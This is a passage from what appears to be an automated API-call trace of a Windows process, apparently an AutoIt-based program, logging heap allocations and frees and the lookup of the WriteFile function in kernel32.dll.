[0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0178.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0178.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0178.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.053] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.054] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0178.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0178.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.056] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.060] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0178.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9b9a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.060] GetProcAddress 